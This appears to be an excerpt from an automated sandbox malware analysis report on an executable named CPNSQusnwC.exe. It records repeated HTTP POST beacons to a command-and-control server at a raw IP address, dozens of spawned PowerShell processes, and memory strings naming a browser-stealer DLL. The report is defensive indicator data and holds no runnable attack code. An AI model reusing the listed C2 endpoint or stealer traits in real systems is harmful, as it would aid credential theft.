                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2499619522.000001B700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE673FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBBA87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760AC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B22506C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.000002800022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE34A20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BEAE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: CPNSQusnwC.exe, 00000000.00000002.2187273865.000000000329B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2499619522.000001B700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE67101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760A9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B224D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE347F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BE8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18B931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2499619522.000001B700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE673FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBBA87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760AC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B22506C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.000002800022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE34A20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BEAE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.2499619522.000001B700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE67101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760A9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B224D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE347F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BE8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18B931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exeProcess created: 44

                    System Summary

                    barindex
                    .NET source code contains very large strings
                    Source: CPNSQusnwC.exe, s67.csLong String: Length: 1085332
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343D1EC30_2_00007FFD343D1EC3
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343E34150_2_00007FFD343E3415
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343E3DE70_2_00007FFD343E3DE7
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DA6100_2_00007FFD343DA610
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DD7B00_2_00007FFD343DD7B0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DD8200_2_00007FFD343DD820
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DD8300_2_00007FFD343DD830
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DD8400_2_00007FFD343DD840
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A585F0_2_00007FFD345A585F
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA0D00_2_00007FFD345AA0D0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345B04D40_2_00007FFD345B04D4
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA0A00_2_00007FFD345AA0A0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA0B00_2_00007FFD345AA0B0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1200_2_00007FFD345AA120
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1000_2_00007FFD345AA100
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1100_2_00007FFD345AA110
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A90FA0_2_00007FFD345A90FA
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AACF20_2_00007FFD345AACF2
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345B04F20_2_00007FFD345B04F2
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1C00_2_00007FFD345AA1C0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1900_2_00007FFD345AA190
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA1700_2_00007FFD345AA170
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA2500_2_00007FFD345AA250
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA2200_2_00007FFD345AA220
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A16870_2_00007FFD345A1687
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA2800_2_00007FFD345AA280
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A82680_2_00007FFD345A8268
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A7E780_2_00007FFD345A7E78
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345AA2700_2_00007FFD345AA270
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345B03270_2_00007FFD345B0327
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A16FA0_2_00007FFD345A16FA
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A13CF0_2_00007FFD345A13CF
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A0C080_2_00007FFD345A0C08
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A13E00_2_00007FFD345A13E0
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345B03FA0_2_00007FFD345B03FA
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD349601F20_2_00007FFD349601F2
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD34965B7F0_2_00007FFD34965B7F
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AxLDtRxd.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                    Source: CPNSQusnwC.exe, 00000000.00000002.2202046245.0000000013410000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2215989480.000000001BA22000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2217050443.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2217050443.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2186892873.0000000002DA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformBlock'
                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
